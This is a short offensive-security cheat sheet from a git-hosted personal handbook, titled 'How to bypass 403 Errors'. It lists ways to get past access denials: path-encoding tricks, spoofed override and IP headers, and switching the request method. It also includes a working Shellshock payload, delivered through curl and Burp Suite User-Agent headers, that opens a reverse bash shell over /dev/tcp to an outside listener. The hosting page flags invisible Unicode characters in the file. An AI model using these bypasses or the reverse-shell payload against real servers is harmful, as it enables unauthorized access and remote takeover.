x/handbook
1
0
Fork 0
Code Issues Pull requests Actions Packages Projects Releases Wiki Activity
handbook/tools/Others/Bypass/WAF/403-Bypass.md
Anton Nesterov af9011411c
vault backup: 2024-08-31 01:07:21
2024-08-31 01:07:22 +02:00

39 lines
1.3 KiB
Markdown
Raw Permalink Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

**How to bypass 403 Errors**
**Technique number 1**
- Appending `{%2e} or {%2f} { **/*, /./}` after the first slash
- https://www.domain/DB = 403
- https://www.domain/%2e/DB] =200
- https://www.domain/./DB] =200
**Technique number 2**
- Adding headers to requests module.
- Content-Length: 0
- X-rewrite-url
- X-Original-URL
- X-Custom-IP-Authorization
- X-Forwarded-For
**Technique number 3**
- Change the request method
- GET → POST
- GET → TRACE
- GET → PUT
- GET **→** OPTIONS
**Technique number 4**
- Using Curl
- curl -i -s -k -X $GET -H $Host: account.domain.com -H $X-rewrite-url: admin/login $https://account.domain.com/'
**Technique number 5**
- Brute force sub directory from the 403 directory
- Try using (wordlist/dirb/comon.txt)
- Setup Netcat lisener
- Inject parameters from Curl or Burp Suite
- CURL ---> curl -A “() { :; }; /bin/bash -i > /dev/tcp/192.168.2.13/9000 0<&1 2>&1” http://192.168.2.18/cgi-bin/helloworld.cgi
- Burp Suite ---> Change User-Agent: () { :; }; /bin/bash -i > /dev/tcp/192.168.2.13/9000 0<&1 2>&1
- More info ---> https://hackbotone.com/shellshock-attack-on-a-remote-web-server-d9124f4a0af3
**Technique number 6**
- Kali linux tool ---> 403 bypass
Reference in a new issue View git blame Copy permalink